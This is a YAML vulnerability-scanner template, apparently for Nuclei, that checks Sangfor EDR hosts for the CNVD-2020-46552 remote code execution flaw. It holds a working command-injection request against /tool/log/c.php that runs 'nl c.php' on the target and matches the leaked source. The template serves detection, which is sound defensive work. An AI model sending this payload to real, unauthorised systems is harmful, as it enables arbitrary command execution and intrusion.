26 lines
980 B
YAML
id: CNVD-2020-46552
info:
  name: Sangfor EDR Tool - Remote Code Execution
  author: ritikchaddha
  severity: critical
  description: There is a RCE vulnerability in Sangfor Endpoint Monitoring and Response Platform (EDR). An attacker could exploit this vulnerability by constructing an HTTP request, and an attacker who successfully exploited this vulnerability could execute arbitrary commands on the target host.
  reference:
    - https://www.modb.pro/db/144475
    - https://blog.csdn.net/bigblue00/article/details/108434009
    - https://cn-sec.com/archives/721509.html
  tags: cnvd,cnvd2020,sangfor,rce

requests:
  - method: GET
    path:
      - "{{BaseURL}}/tool/log/c.php?strip_slashes=printf&host=nl+c.php"

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "$show_input = function($info)")'
          - 'contains(body, "$strip_slashes($host)")'
          - 'contains(body, "Log Helper")'
          - 'status_code == 200'
        condition: and